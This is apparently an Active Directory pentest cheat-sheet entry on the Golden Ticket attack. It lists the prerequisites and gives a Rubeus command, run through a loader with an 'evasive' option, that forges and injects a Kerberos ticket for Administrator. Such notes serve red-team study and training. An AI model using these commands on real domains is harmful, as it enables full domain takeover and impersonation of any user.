🎫 Golden Ticket

A forged Ticket Granting Ticket (TGT) signed with the krbtgt account hash. It allows an attacker to impersonate any user (usually the Administrator) and claim any group membership.

Requirements:

krbtgt NTLM hash or AES256 key.
Domain SID (Security Identifier).
Target Username and Relative ID (RID) (typically 500 for Administrator).

Get-DomainSID

C:\AD\Tools\Loader.exe -path C:\AD\Tools\Rubeus.exe -args evasive-golden /aes256:[HASH_KRBTGT] /sid:[DOMAIN_SID] /user:Administrator /id:500 /ptt